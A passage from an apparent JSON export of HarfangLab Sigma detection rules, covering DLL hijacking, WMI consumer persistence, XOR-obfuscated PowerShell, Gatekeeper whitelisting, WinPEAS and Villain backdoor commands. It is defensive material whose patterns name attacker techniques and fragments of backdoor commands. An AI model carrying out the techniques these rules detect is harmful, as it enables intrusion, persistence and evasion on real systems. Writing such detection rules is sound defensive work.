"content": "title: DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe\nid: 7868bb44-021b-4507-b436-948eee128c21\ndescription: |\n Detects potential Windows DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/dez_/status/1547612120094650374\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/19\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Microsoft.SharePoint.NativeMessaging.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\Secur32.dll'\n - '\\VERSION.dll'\n - '\\WININET.dll'\n - '\\WTSAPI32.dll'\n - '\\USERENV.dll'\n - '\\SSPICLI.DLL'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7868bb44-021b-4507-b436-948eee128c21",
"rule_name": "DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Microsoft.SharePoint.NativeMessagingClient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "789591b5-b238-4ee1-8c07-581219e9f298",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589832Z",
"creation_date": "2026-03-23T11:45:34.589836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589844Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_reagentc.yml",
"content": "title: DLL Hijacking via reagentc.exe\nid: 789591b5-b238-4ee1-8c07-581219e9f298\ndescription: |\n Detects potential Windows DLL Hijacking via reagentc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'reagentc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\dbghelp.dll'\n - '\\ReAgent.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "789591b5-b238-4ee1-8c07-581219e9f298",
"rule_name": "DLL Hijacking via reagentc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via reagentc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78dba5b0-1ea3-47fc-a4f4-ccc24ba63a84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076391Z",
"creation_date": "2026-03-23T11:45:34.076393Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076398Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
"https://attack.mitre.org/techniques/T1546/003/"
],
"name": "t1546_003_wmi_suspicious_consumer.yml",
"content": "title: Suspicious WMI Consumer\nid: 78dba5b0-1ea3-47fc-a4f4-ccc24ba63a84\ndescription: |\n Detects the creation of a suspicious WMI consumer used to execute malicious actions on a specific trigger.\n Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\n WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\n By default, two consumer classes can be used maliciously:\n - Script: execute the specified code or related script.\n - Command-line: execute the specified command-line.\n\n It is recommended to investigate this action to determine its legitimacy; you may use the Get-WmiObject PowerShell cmdlet and investigate any suspicious objects.\nreferences:\n - https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html\n - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\n - https://attack.mitre.org/techniques/T1546/003/\ndate: 2023/12/07\nmodified: 2025/06/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.WmiEvent\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: wmi_event\ndetection:\n selection:\n EventID: 20\n Type:\n - Script\n - Command Line\n Operation:\n - Created\n - Modified\n\n exclusion_hp:\n - Name:\n - HP USB-C Dock G5 Consumer\n - HP Thunderbolt Dock G4 Consumer\n - HP USB-C&A Universal Dock G2 Consumer\n - HP Thunderbolt Dock G2 Consumer\n - Destination: '?:\\Program Files\\HP\\HP Firmware Installer\\\\*\\HPFirmwareInstaller.exe'\n exclusion_dell:\n Name:\n - DellCommandPowerManagerPolicyChangeEventConsumer\n - 
DellCommandPowerManagerAlertEventConsumer\n exclusion_default:\n Name: 'BVTConsumer'\n Destination: 'cscript KernCap.vbs'\n exclusion_tenablead:\n Name: 'AlsidForAD-Launcher'\n Destination|contains: 'IOA\\Register-TenableADEventsListener.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78dba5b0-1ea3-47fc-a4f4-ccc24ba63a84",
"rule_name": "Suspicious WMI Consumer",
"rule_description": "Detects the creation of a suspicious WMI consumer used to execute malicious actions on a specific trigger.\nAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\nBy default, two consumer classes can be used maliciously:\n - Script: execute the specified code or related script.\n - Command-line: execute the specified command-line.\n\nIt is recommended to investigate this action to determine its legitimacy; you may use the Get-WmiObject PowerShell cmdlet and investigate any suspicious objects.\n",
"rule_creation_date": "2023-12-07",
"rule_modified_date": "2025-06-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78e4265f-a2b1-4c20-abe1-dccac19c20b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608211Z",
"creation_date": "2026-03-23T11:45:34.608214Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608222Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/yellow-cockatoo/",
"https://redcanary.com/threat-detection-report/techniques/powershell/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/"
],
"name": "t1059_001_powershell_xor_obfuscation_cmd.yml",
"content": "title: PowerShell XOR Obfuscation in Command-line\nid: 78e4265f-a2b1-4c20-abe1-dccac19c20b6\ndescription: |\n Detects the use of XOR encoding in powershell.exe's command-line.\n Attackers can used this technique to obfuscate its command-line to evade defenses.\n It is recommended to de-obfuscate the command-line, to analyze it and to look for malicious content or actions stemming from the PowerShell process.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2025/04/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_commandline:\n CommandLine|contains:\n # all possible permutations of ' -bxor ' (base64, utf16le, mixedcase)\n - ' -bxor '\n - 'IAAtAGIAeABPAHIAIA'\n - 'AALQBiAHgATwByACAA'\n - 'gAC0AYgB4AE8AcgAgA'\n - 'IAAtAGIAWABvAFIAIA'\n - 'AALQBiAFgAbwBSACAA'\n - 'gAC0AYgBYAG8AUgAgA'\n - 'IAAtAEIAeABPAHIAIA'\n - 'AALQBCAHgATwByACAA'\n - 'gAC0AQgB4AE8AcgAgA'\n - 'IAAtAEIAWABvAFIAIA'\n - 'AALQBCAFgAbwBSACAA'\n - 'gAC0AQgBYAG8AUgAgA'\n - 'IAAtAEIAeABvAFIAIA'\n - 'AALQBCAHgAbwBSACAA'\n - 'gAC0AQgB4AG8AUgAgA'\n - 'IAAtAEIAeABPAFIAIA'\n - 'AALQBCAHgATwBSACAA'\n - 'gAC0AQgB4AE8AUgAgA'\n - 'IAAtAEIAWABPAFIAIA'\n - 'AALQBCAFgATwBSACAA'\n - 'gAC0AQgBYAE8AUgAgA'\n - 'IAAtAGIAWABPAFIAIA'\n - 'AALQBiAFgATwBSACAA'\n - 'gAC0AYgBYAE8AUgAgA'\n - 'IAAtAGIAWABvAHIAIA'\n - 'AALQBiAFgAbwByACAA'\n - 'gAC0AYgBYAG8AcgAgA'\n - 'IAAtAGIAeABPAFIAIA'\n - 'AALQBiAHgATwBSACAA'\n - 
'gAC0AYgB4AE8AUgAgA'\n - 'IAAtAGIAeABvAFIAIA'\n - 'AALQBiAHgAbwBSACAA'\n - 'gAC0AYgB4AG8AUgAgA'\n - 'IAAtAGIAeABvAHIAIA'\n - 'AALQBiAHgAbwByACAA'\n - 'gAC0AYgB4AG8AcgAgA'\n - 'IAAtAGIAWABPAHIAIA'\n - 'AALQBiAFgATwByACAA'\n - 'gAC0AYgBYAE8AcgAgA'\n - 'IAAtAEIAWABvAHIAIA'\n - 'AALQBCAFgAbwByACAA'\n - 'gAC0AQgBYAG8AcgAgA'\n - 'IAAtAEIAeABvAHIAIA'\n - 'AALQBCAHgAbwByACAA'\n - 'gAC0AQgB4AG8AcgAgA'\n - 'IAAtAEIAWABPAHIAIA'\n - 'AALQBCAFgATwByACAA'\n - 'gAC0AQgBYAE8AcgAgA'\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\program files (x86)\\'\n - '?:\\program files\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78e4265f-a2b1-4c20-abe1-dccac19c20b6",
"rule_name": "PowerShell XOR Obfuscation in Command-line",
"rule_description": "Detects the use of XOR encoding in powershell.exe's command-line.\nAttackers can use this technique to obfuscate the command-line to evade defenses.\nIt is recommended to de-obfuscate the command-line, to analyze it and to look for malicious content or actions stemming from the PowerShell process.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2025-04-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78e70aaa-2977-414b-a2be-47a4f46026bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092962Z",
"creation_date": "2026-03-23T11:45:34.092965Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092972Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper",
"https://support.apple.com/fr-fr/guide/security/sec5599b66df/web",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_add_gatekeeper_whitelist.yml",
"content": "title: Gatekeeper Whitelist Added\nid: 78e70aaa-2977-414b-a2be-47a4f46026bb\ndescription: |\n Detects the execution of spctl to add a whitelist to Apple Gatekeeper.\n Apple Gatekeeper is a mechanism that ensures that software comes from trusted developers, is notarized by Apple as malware-free, and remains unaltered.\n Apple Gatekeeper also requests user approval before opening downloaded software for the first time.\n It is recommended to investigate the process that added the Apple Gatekeeper whitelist and the whitelisted program to determine if this action was legitimate.\nreferences:\n - https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper\n - https://support.apple.com/fr-fr/guide/security/sec5599b66df/web\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/05/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.LOLBin.Spctl\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/spctl'\n CommandLine|contains|all:\n - '--enable'\n - '--tag'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78e70aaa-2977-414b-a2be-47a4f46026bb",
"rule_name": "Gatekeeper Whitelist Added",
"rule_description": "Detects the execution of spctl to add a whitelist to Apple Gatekeeper.\nApple Gatekeeper is a mechanism that ensures that software comes from trusted developers, is notarized by Apple as malware-free, and remains unaltered.\nApple Gatekeeper also requests user approval before opening downloaded software for the first time.\nIt is recommended to investigate the process that added the Apple Gatekeeper whitelist and the whitelisted program to determine if this action was legitimate.\n",
"rule_creation_date": "2024-05-03",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7904081b-0c28-43d6-9af7-29d3f8704057",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606188Z",
"creation_date": "2026-03-23T11:45:34.606194Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606203Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS",
"https://attack.mitre.org/techniques/T1082/",
"https://attack.mitre.org/techniques/T1592/",
"https://attack.mitre.org/tactics/TA0004/"
],
"name": "t1082_launch_winpeas.yml",
"content": "title: WinPEAS HackTool Executed\nid: 7904081b-0c28-43d6-9af7-29d3f8704057\ndescription: |\n Detects the execution of WinPEAS (Windows Privilege Escalation Awesome Scripts) enumeration tool.\n WinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\n Unless this is part of an authorized security assessment, investigate the user context and look for subsequent privilege escalation attempts.\nreferences:\n - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\n - https://attack.mitre.org/techniques/T1082/\n - https://attack.mitre.org/techniques/T1592/\n - https://attack.mitre.org/tactics/TA0004/\ndate: 2022/10/19\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.reconnaissance\n - attack.t1592.001\n - attack.t1592.002\n - attack.t1592.004\n - attack.privilege_escalation\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WinPEAS\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\WinPEAS*.exe'\n - OriginalFileName: 'WinPEAS*.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7904081b-0c28-43d6-9af7-29d3f8704057",
"rule_name": "WinPEAS HackTool Executed",
"rule_description": "Detects the execution of WinPEAS (Windows Privilege Escalation Awesome Scripts) enumeration tool.\nWinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\nUnless this is part of an authorized security assessment, investigate the user context and look for subsequent privilege escalation attempts.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1082",
"attack.t1592.001",
"attack.t1592.002",
"attack.t1592.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "791a287c-44d9-4e49-bc5c-4b5c179c21c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084578Z",
"creation_date": "2026-03-23T11:45:34.084580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084584Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/t3l3machus/Villain",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1059_001_powershell_villain_backdoor.yml",
"content": "title: Suspicious PowerShell Command linked to Villain\nid: 791a287c-44d9-4e49-bc5c-4b5c179c21c1\ndescription: |\n Detects PowerShell commands executing a Villain framework payload.\n Villain is a Windows & Linux backdoor generator and multi-session handler.\n The framework allows attackers to instantiate shells and control other machines running Villain in the network.\n It is recommended to investigate PowerShell logs, terminate affected processes and isolate compromised hosts.\nreferences:\n - https://github.com/t3l3machus/Villain\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/12/06\nmodified: 2025/01/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1132.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Villain\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '$env:COMPUTERNAME'\n - '$env:USERNAME'\n - '-Method POST'\n - 'Headers @{Authorization=$*}'\n - 'UTF8.GetBytes($*+$*) -join'\n - '-Ur? $*$*/'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "791a287c-44d9-4e49-bc5c-4b5c179c21c1",
"rule_name": "Suspicious PowerShell Command linked to Villain",
"rule_description": "Detects PowerShell commands executing a Villain framework payload.\nVillain is a Windows & Linux backdoor generator and multi-session handler.\nThe framework allows attackers to instantiate shells and control other machines running Villain in the network.\nIt is recommended to investigate PowerShell logs, terminate affected processes and isolate compromised hosts.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "791dc1ad-1617-4926-90cc-51f57089c4ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605419Z",
"creation_date": "2026-03-23T11:45:34.605422Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605430Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md",
"https://attack.mitre.org/techniques/T1614/001/"
],
"name": "t1614_001_system_language_discovery_registry.yml",
"content": "title: System Language Discovered in Registry\nid: 791dc1ad-1617-4926-90cc-51f57089c4ae\ndescription: |\n Detects the identification of the system's default language by querying the registry.\n Adversaries may attempt to gather information about a victim's default language to infer the geographical location of that host.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md\n - https://attack.mitre.org/techniques/T1614/001/\ndate: 2022/12/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1614.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_reg_bin:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'query'\n # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\n - '\\Control\\Nls\\Language'\n\n filter_installlanguage:\n CommandLine|contains: '/v InstallLanguage'\n\n exclusion_programfiles:\n ProcessParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n ProcessGrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_launchpad:\n ProcessGrandparentImage|endswith:\n - '\\launchpad.exe'\n - '\\launchpad64.exe'\n ProcessGrandparentProduct: 'IBM Program Launcher'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "791dc1ad-1617-4926-90cc-51f57089c4ae",
"rule_name": "System Language Discovered in Registry",
